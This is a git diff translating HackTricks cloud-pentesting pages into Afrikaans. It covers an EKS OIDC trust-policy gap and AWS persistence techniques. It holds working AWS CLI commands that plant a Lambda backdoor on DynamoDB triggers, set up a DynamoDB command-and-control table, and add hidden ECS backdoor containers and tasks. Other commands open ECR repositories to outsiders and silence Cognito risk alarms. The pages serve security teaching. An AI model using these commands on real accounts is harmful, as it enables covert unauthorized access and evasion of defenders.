+Dit is moontlik om **OIDC providers** in 'n **EKS** kluster te genereer deur eenvoudig die **OIDC URL** van die kluster as 'n **nuwe Open ID Identiteitsverskaffer** in te stel. Dit is 'n algemene standaardbeleid:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
-      },
-      "Action": "sts:AssumeRoleWithWebIdentity",
-      "Condition": {
-        "StringEquals": {
-          "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
+}
+}
+}
+]
 }
 ```
+Hierdie beleid dui korrek aan dat **slegs** die **EKS-kluster** met **id** `20C159CDF6F2349B68846BEC03BE031B` die rol kan aanvaar. Dit dui egter nie aan watter diensrekening dit kan aanvaar nie, wat beteken dat **ENIGE diensrekening met 'n webidentiteitskenmerk** in staat gaan wees om die rol te aanvaar.
 
-This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role.
-
-In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as:
-
+Om te spesifiseer **watter diensrekening die rol moet kan aanvaar,** is dit nodig om 'n **voorwaarde** te spesifiseer waar die **diensrekeningnaam gespesifiseer word**, soos:
 ```bash
 "oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
 ```
-
-## References
+## Verwysings
 
 - [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
index 28868b9f1..b77f15149 100644
--- a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
@@ -1,21 +1,17 @@
-# AWS - Permissions for a Pentest
+# AWS - Toestemmings vir 'n Pentest
 
 {{#include ../../banners/hacktricks-training.md}}
 
-These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools:
+Dit is die toestemmings wat jy nodig het op elke AWS-rekening wat jy wil oudit om al die voorgestelde AWS-ouditgereedskap te kan gebruik:
 
-- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
-- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions:
-  - **access-analyzer:List\***
-  - **access-analyzer:Get\***
-  - **iam:CreateServiceLinkedRole**
-  - **access-analyzer:CreateAnalyzer**
-    - Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission)
-  - **access-analyzer:DeleteAnalyzer**
-    - Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission)
+- Die standaard beleid **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
+- Om [aws_iam_review](https://github.com/carlospolop/aws_iam_review) te kan uitvoer, het jy ook die toestemmings nodig:
+- **access-analyzer:List\***
+- **access-analyzer:Get\***
+- **iam:CreateServiceLinkedRole**
+- **access-analyzer:CreateAnalyzer**
+- Opsioneel as die kliënt die analiseerders vir jou genereer, maar gewoonlik is dit makliker om net vir hierdie toestemming te vra)
+- **access-analyzer:DeleteAnalyzer**
+- Opsioneel as die kliënt die analiseerders vir jou verwyder, maar gewoonlik is dit makliker om net vir hierdie toestemming te vra)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md
index f3b45c4d3..b5bbc400d 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/README.md
@@ -1,6 +1 @@
-# AWS - Persistence
-
-
-
-
-
+# AWS - Volharding
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
index 6d2b0ec35..b40f42c18 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
@@ -1,36 +1,32 @@
-# AWS - API Gateway Persistence
+# AWS - API Gateway Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## API Gateway
 
-For more information go to:
+Vir meer inligting, gaan na:
 
 {{#ref}}
 ../aws-services/aws-api-gateway-enum.md
 {{#endref}}
 
-### Resource Policy
+### Hulpbronbeleid
 
-Modify the resource policy of the API gateway(s) to grant yourself access to them
+Wysig die hulpbronbeleid van die API-gateway(s) om jouself toegang te gee tot hulle.
 
-### Modify Lambda Authorizers
+### Wysig Lambda Outeurs
 
-Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
-Or just remove the use of the authorizer.
+Wysig die kode van lambda outeurs om jouself toegang te gee tot al die eindpunte.\
+Of verwyder net die gebruik van die outeur.
 
-### IAM Permissions
+### IAM Toestemmings
 
-If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\
-Or just remove the use of the authorizer.
+As 'n hulpbron IAM outeur gebruik, kan jy jouself toegang gee deur IAM toestemmings te wysig.\
+Of verwyder net die gebruik van die outeur.
 
-### API Keys
+### API Sleutels
 
-If API keys are used, you could leak them to maintain persistence or even create new ones.\
-Or just remove the use of API keys.
+As API sleutels gebruik word, kan jy hulle lek om volharding te handhaaf of selfs nuwe te skep.\
+Of verwyder net die gebruik van API sleutels.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
index e2e037e53..5d8dd38b5 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
@@ -1,27 +1,27 @@
-# AWS - Cognito Persistence
+# AWS - Cognito Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Cognito
 
-For more information, access:
+Vir meer inligting, toegang:
 
 {{#ref}}
 ../aws-services/aws-cognito-enum/
 {{#endref}}
 
-### User persistence
+### Gebruiker persistensie
 
-Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like:
+Cognito is 'n diens wat dit moontlik maak om rolle aan nie-geverifieerde en geverifieerde gebruikers toe te ken en om 'n gids van gebruikers te beheer. Verskeie verskillende konfigurasies kan verander word om 'n mate van persistensie te handhaaf, soos:
 
-- **Adding a User Pool** controlled by the user to an Identity Pool
-- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
-  - Or to an **authenticated Identity Pool** if the attacker can login
-  - Or **improve the permissions** of the given roles
-- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool**
-- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
+- **Voeg 'n Gebruiker Pool** wat deur die gebruiker beheer word, by 'n Identiteits Pool
+- Gee 'n **IAM rol aan 'n nie-geverifieerde Identiteits Pool en laat Basiese auth vloei toe**
+- Of aan 'n **geverifieerde Identiteits Pool** as die aanvaller kan aanmeld
+- Of **verbeter die toestemmings** van die gegewe rolle
+- **Skep, verifieer & privesc** via attributes wat deur gebruikers of nuwe gebruikers in 'n **Gebruiker Pool** beheer word
+- **Laat eksterne Identiteits Verskaffers** toe om in 'n Gebruiker Pool of in 'n Identiteits Pool aan te meld
 
-Check how to do these actions in
+Kyk hoe om hierdie aksies uit te voer in
 
 {{#ref}}
 ../aws-privilege-escalation/aws-cognito-privesc.md
@@ -29,18 +29,12 @@ Check how to do these actions in
 
 ### `cognito-idp:SetRiskConfiguration`
 
-An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options:
-
+'n Aanvaller met hierdie voorregte kan die risiko konfigurasie verander om as 'n Cognito gebruiker aan te meld **sonder dat alarms geaktiveer word**. [**Kyk na die cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) om al die opsies te kyk:
 ```bash
 aws cognito-idp set-risk-configuration --user-pool-id <pool-id> --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
 ```
-
-By default this is disabled:
+Standaard is dit gedeaktiveer:
 
 <figure><img src="https://lh6.googleusercontent.com/EOiM0EVuEgZDfW3rOJHLQjd09-KmvraCMssjZYpY9sVha6NcxwUjStrLbZxAT3D3j9y08kd5oobvW8a2fLUVROyhkHaB1OPhd7X6gJW3AEQtlZM62q41uYJjTY1EJ0iQg6Orr1O7yZ798EpIJ87og4Tbzw=s2048" alt=""><figcaption></figcaption></figure>
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
index 75a824e73..7d465c3df 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
@@ -1,67 +1,59 @@
-# AWS - DynamoDB Persistence
+# AWS - DynamoDB Volharding
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ### DynamoDB
 
-For more information access:
+Vir meer inligting, toegang:
 
 {{#ref}}
 ../aws-services/aws-dynamodb-enum.md
 {{#endref}}
 
-### DynamoDB Triggers with Lambda Backdoor
-
-Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
+### DynamoDB Triggers met Lambda Agterdeur
 
+Deur gebruik te maak van DynamoDB triggers, kan 'n aanvaller 'n **stealthy agterdeur** skep deur 'n kwaadwillige Lambda-funksie met 'n tabel te assosieer. Die Lambda-funksie kan geaktiveer word wanneer 'n item bygevoeg, gewysig of verwyder word, wat die aanvaller in staat stel om arbitrêre kode binne die AWS-rekening uit te voer.
 ```bash
 # Create a malicious Lambda function
 aws lambda create-function \
-    --function-name MaliciousFunction \
-    --runtime nodejs14.x \
-    --role <LAMBDA_ROLE_ARN> \
-    --handler index.handler \
-    --zip-file fileb://malicious_function.zip \
-    --region <region>
+--function-name MaliciousFunction \
+--runtime nodejs14.x \
+--role <LAMBDA_ROLE_ARN> \
+--handler index.handler \
+--zip-file fileb://malicious_function.zip \
+--region <region>
 
 # Associate the Lambda function with the DynamoDB table as a trigger
 aws dynamodbstreams describe-stream \
-    --table-name TargetTable \
-    --region <region>
+--table-name TargetTable \
+--region <region>
 
 # Note the "StreamArn" from the output
 aws lambda create-event-source-mapping \
-    --function-name MaliciousFunction \
-    --event-source <STREAM_ARN> \
-    --region <region>
+--function-name MaliciousFunction \
+--event-source <STREAM_ARN> \
+--region <region>
 ```
+Om volharding te handhaaf, kan die aanvaller items in die DynamoDB-tabel skep of wysig, wat die kwaadwillige Lambda-funksie sal aktiveer. Dit stel die aanvaller in staat om kode binne die AWS-rekening uit te voer sonder direkte interaksie met die Lambda-funksie.
 
-To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
-
-### DynamoDB as a C2 Channel
-
-An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
+### DynamoDB as 'n C2-kanaal
 
+'n Aanvaller kan 'n DynamoDB-tabel gebruik as 'n **opdrag en beheer (C2) kanaal** deur items te skep wat opdragte bevat en gecompromitteerde instansies of Lambda-funksies te gebruik om hierdie opdragte op te haal en uit te voer.
 ```bash
 # Create a DynamoDB table for C2
 aws dynamodb create-table \
-    --table-name C2Table \
-    --attribute-definitions AttributeName=CommandId,AttributeType=S \
-    --key-schema AttributeName=CommandId,KeyType=HASH \
-    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
-    --region <region>
+--table-name C2Table \
+--attribute-definitions AttributeName=CommandId,AttributeType=S \
+--key-schema AttributeName=CommandId,KeyType=HASH \
+--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
+--region <region>
 
 # Insert a command into the table
 aws dynamodb put-item \
-    --table-name C2Table \
-    --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
-    --region <region>
+--table-name C2Table \
+--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
+--region <region>
 ```
-
-The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
+Die gecompromitteerde instansies of Lambda-funksies kan periodiek die C2-tabel vir nuwe opdragte nagaan, dit uitvoer, en opsioneel die resultate terug na die tabel rapporteer. Dit stel die aanvaller in staat om volharding en beheer oor die gecompromitteerde hulpbronne te handhaaf.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
index b52ac9e85..0e7acb9ae 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
@@ -1,58 +1,54 @@
-# AWS - EC2 Persistence
+# AWS - EC2 Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## EC2
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
 {{#endref}}
 
-### Security Group Connection Tracking Persistence
+### Sekuriteitsgroep Verbinding Volg Persistensie
 
-If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic.
+As 'n verdediger vind dat 'n **EC2-instantie gecompromitteer is**, sal hy waarskynlik probeer om die **netwerk** van die masjien te **isoleer**. Hy kan dit doen met 'n eksplisiete **Deny NACL** (maar NACLs beïnvloed die hele subnet), of deur die **sekuriteitsgroep** te verander om **enige soort van inkomende of uitgaande** verkeer te verbied.
 
-If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
+As die aanvaller 'n **omgekeerde shell afkomstig van die masjien** gehad het, selfs al is die SG gewysig om nie inkomende of uitgaande verkeer toe te laat nie, sal die **verbinding nie beëindig word nie** [**Sekuriteitsgroep Verbinding Volg**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
 
-### EC2 Lifecycle Manager
+### EC2 Levensiklusbestuurder
 
-This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
-An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
+Hierdie diens laat toe om die **skepping van AMIs en snapshots** te **skeduleer** en selfs om dit met ander rekeninge te **deel**.\
+'n Aanvaller kan die **generering van AMIs of snapshots** van al die beelde of al die volumes **elke week** skeduleer en dit **met sy rekening deel**.
 
-### Scheduled Instances
+### Geskeduleerde Instanties
 
-It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access.
+Dit is moontlik om instanties te skeduleer om daagliks, weekliks of selfs maandeliks te loop. 'n Aanvaller kan 'n masjien met hoë voorregte of interessante toegang laat loop waar hy toegang kan verkry.
 
-### Spot Fleet Request
+### Spot Vloot Versoek
 
-Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**.
+Spot-instanties is **goedkoper** as gewone instanties. 'n Aanvaller kan 'n **klein spot vlootversoek vir 5 jaar** (byvoorbeeld) begin, met **outomatiese IP** toewysing en 'n **gebruikersdata** wat na die aanvaller **stuur wanneer die spot-instantie begin** en die **IP-adres** en met 'n **hoë voorregte IAM-rol**.
 
-### Backdoor Instances
+### Agterdeur Instanties
 
-An attacker could get access to the instances and backdoor them:
+'n Aanvaller kan toegang tot die instanties verkry en dit agterdeur:
 
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
-- Backdooring the **User Data**
+- Gebruik 'n tradisionele **rootkit** byvoorbeeld
+- Voeg 'n nuwe **publieke SSH-sleutel** by (kyk [EC2 privesc opsies](../aws-privilege-escalation/aws-ec2-privesc.md))
+- Agterdeur die **Gebruikersdata**
 
-### **Backdoor Launch Configuration**
+### **Agterdeur Ontplooiing Konfigurasie**
 
-- Backdoor the used AMI
-- Backdoor the User Data
-- Backdoor the Key Pair
+- Agterdeur die gebruikte AMI
+- Agterdeur die Gebruikersdata
+- Agterdeur die Sleutel Paar
 
 ### VPN
 
-Create a VPN so the attacker will be able to connect directly through i to the VPC.
+Skep 'n VPN sodat die aanvaller direk deur dit na die VPC kan verbind.
 
 ### VPC Peering
 
-Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
+Skep 'n peeringverbinding tussen die slagoffer VPC en die aanvaller VPC sodat hy toegang tot die slagoffer VPC kan verkry.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
index 07928fbd4..02081dc0b 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
@@ -1,101 +1,91 @@
-# AWS - ECR Persistence
+# AWS - ECR Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## ECR
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-ecr-enum.md
 {{#endref}}
 
-### Hidden Docker Image with Malicious Code
+### Versteekte Docker Beeld met Kwaadwillige Kode
 
-An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
+'n Aanvaller kan **'n Docker beeld wat kwaadwillige kode bevat** na 'n ECR-bewaarplek op te laai en dit gebruik om volharding in die teiken AWS-rekening te handhaaf. Die aanvaller kan dan die kwaadwillige beeld na verskeie dienste binne die rekening ontplooi, soos Amazon ECS of EKS, op 'n stil manier.
 
-### Repository Policy
-
-Add a policy to a single repository granting yourself (or everybody) access to a repository:
+### Bewaarplek Beleid
 
+Voeg 'n beleid by 'n enkele bewaarplek wat jouself (of almal) toegang tot 'n bewaarplek gee:
 ```bash
 aws ecr set-repository-policy \
-    --repository-name cluster-autoscaler \
-    --policy-text file:///tmp/my-policy.json
+--repository-name cluster-autoscaler \
+--policy-text file:///tmp/my-policy.json
 
 # With a .json such as
 
 {
-    "Version" : "2008-10-17",
-    "Statement" : [
-        {
-            "Sid" : "allow public pull",
-            "Effect" : "Allow",
-            "Principal" : "*",
-            "Action" : [
-                "ecr:BatchCheckLayerAvailability",
-                "ecr:BatchGetImage",
-                "ecr:GetDownloadUrlForLayer"
-            ]
-        }
-    ]
+"Version" : "2008-10-17",
+"Statement" : [
+{
+"Sid" : "allow public pull",
+"Effect" : "Allow",
+"Principal" : "*",
+"Action" : [
+"ecr:BatchCheckLayerAvailability",
+"ecr:BatchGetImage",
+"ecr:GetDownloadUrlForLayer"
+]
+}
+]
 }
 ```
-
 > [!WARNING]
-> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
+> Let daarop dat ECR vereis dat gebruikers **toestemming** het om oproepe na die **`ecr:GetAuthorizationToken`** API te maak deur 'n IAM-beleid **voordat hulle kan autentiseer** by 'n registrasie en enige beelde van enige Amazon ECR-bewaarplek kan stoot of trek.
 
-### Registry Policy & Cross-account Replication
+### Registrasiebeleid & Kruisrekening Replikaasje
 
-It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
+Dit is moontlik om 'n registrasie in 'n eksterne rekening outomaties te repliseer deur kruisrekening replikaasie te konfigureer, waar jy die **eksterne rekening** moet **aandui** waar jy die registrasie wil repliseer.
 
 <figure><img src="../../../images/image (79).png" alt=""><figcaption></figcaption></figure>
 
-First, you need to give the external account access over the registry with a **registry policy** like:
-
+Eerstens, moet jy die eksterne rekening toegang gee oor die registrasie met 'n **registrasiebeleid** soos:
 ```bash
 aws ecr put-registry-policy --policy-text file://my-policy.json
 
 # With a .json like:
 
 {
-  "Sid": "asdasd",
-  "Effect": "Allow",
-  "Principal": {
-    "AWS": "arn:aws:iam::947247140022:root"
-  },
-  "Action": [
-    "ecr:CreateRepository",
-    "ecr:ReplicateImage"
-  ],
-  "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
+"Sid": "asdasd",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::947247140022:root"
+},
+"Action": [
+"ecr:CreateRepository",
+"ecr:ReplicateImage"
+],
+"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
 }
 ```
-
-Then apply the replication config:
-
+Dan pas die replikasie-konfigurasie toe:
 ```bash
 aws ecr put-replication-configuration \
-     --replication-configuration file://replication-settings.json \
-     --region us-west-2
+--replication-configuration file://replication-settings.json \
+--region us-west-2
 
 # Having the .json a content such as:
 {
-	"rules": [{
-		"destinations": [{
-			"region": "destination_region",
-			"registryId": "destination_accountId"
-		}],
-		"repositoryFilters": [{
-			"filter": "repository_prefix_name",
-			"filterType": "PREFIX_MATCH"
-		}]
-	}]
+"rules": [{
+"destinations": [{
+"region": "destination_region",
+"registryId": "destination_accountId"
+}],
+"repositoryFilters": [{
+"filter": "repository_prefix_name",
+"filterType": "PREFIX_MATCH"
+}]
+}]
 }
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
index 988626c8f..56f5f4c4e 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
@@ -1,32 +1,31 @@
-# AWS - ECS Persistence
+# AWS - ECS Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## ECS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-ecs-enum.md
 {{#endref}}
 
-### Hidden Periodic ECS Task
+### Verborgen Periodieke ECS Taak
 
 > [!NOTE]
-> TODO: Test
-
-An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
+> TODO: Toets
 
+'n Aanvaller kan 'n verborgen periodieke ECS-taak skep met behulp van Amazon EventBridge om **die uitvoering van 'n kwaadwillige taak periodiek te skeduleer**. Hierdie taak kan verkenning uitvoer, data uitbring of volharding in die AWS-rekening handhaaf.
 ```bash
 # Create a malicious task definition
 aws ecs register-task-definition --family "malicious-task" --container-definitions '[
-  {
-    "name": "malicious-container",
-    "image": "malicious-image:latest",
-    "memory": 256,
-    "cpu": 10,
-    "essential": true
-  }
+{
+"name": "malicious-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+}
 ]'
 
 # Create an Amazon EventBridge rule to trigger the task periodically
@@ -34,70 +33,61 @@ aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate
 
 # Add a target to the rule to run the malicious ECS task
 aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
-  {
-    "Id": "malicious-ecs-task-target",
-    "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
-    "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
-    "EcsParameters": {
-      "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
-      "TaskCount": 1
-    }
-  }
+{
+"Id": "malicious-ecs-task-target",
+"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
+"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
+"EcsParameters": {
+"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
+"TaskCount": 1
+}
+}
 ]'
 ```
-
 ### Backdoor Container in Existing ECS Task Definition
 
 > [!NOTE]
-> TODO: Test
-
-An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities.
+> TODO: Toets
 
+'n Aanvaller kan 'n **stealthy backdoor container** by 'n bestaande ECS-taakdefinisie voeg wat saam met wettige houers loop. Die backdoor container kan gebruik word vir volharding en om kwaadwillige aktiwiteite uit te voer.
 ```bash
 # Update the existing task definition to include the backdoor container
 aws ecs register-task-definition --family "existing-task" --container-definitions '[
-  {
-    "name": "legitimate-container",
-    "image": "legitimate-image:latest",
-    "memory": 256,
-    "cpu": 10,
-    "essential": true
-  },
-  {
-    "name": "backdoor-container",
-    "image": "malicious-image:latest",
-    "memory": 256,
-    "cpu": 10,
-    "essential": false
-  }
+{
+"name": "legitimate-container",
+"image": "legitimate-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+},
+{
+"name": "backdoor-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": false
+}
 ]'
 ```
-
-### Undocumented ECS Service
+### Ondokumenteerde ECS-diens
 
 > [!NOTE]
-> TODO: Test
-
-An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
+> TODO: Toets
 
+'n Aanvaller kan 'n **ondokumenteerde ECS-diens** skep wat 'n kwaadwillige taak uitvoer. Deur die verlangde aantal take op 'n minimum in te stel en logging te deaktiveer, word dit moeiliker vir administrateurs om die kwaadwillige diens op te merk.
 ```bash
 # Create a malicious task definition
 aws ecs register-task-definition --family "malicious-task" --container-definitions '[
-  {
-    "name": "malicious-container",
-    "image": "malicious-image:latest",
-    "memory": 256,
-    "cpu": 10,
-    "essential": true
-  }
+{
+"name": "malicious-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+}
 ]'
 
 # Create an undocumented ECS service with the malicious task definition
 aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
index bdb282d41..b556d1ce8 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
@@ -1,25 +1,21 @@
-# AWS - EFS Persistence
+# AWS - EFS Persistensie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## EFS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-efs-enum.md
 {{#endref}}
 
-### Modify Resource Policy / Security Groups
+### Wysig Hulpbronbeleid / Sekuriteitsgroepe
 
-Modifying the **resource policy and/or security groups** you can try to persist your access into the file system.
+Deur die **hulpbronbeleid en/of sekuriteitsgroepe** te wysig, kan jy probeer om jou toegang tot die lêerstelsel te behou.
 
-### Create Access Point
+### Skep Toegangspunt
 
-You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system.
+Jy kan **'n toegangspunt skep** (met worteltoegang tot `/`) wat toeganklik is vanaf 'n diens waar jy **ander volharding** geïmplementeer het om bevoorregte toegang tot die lêerstelsel te hou.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
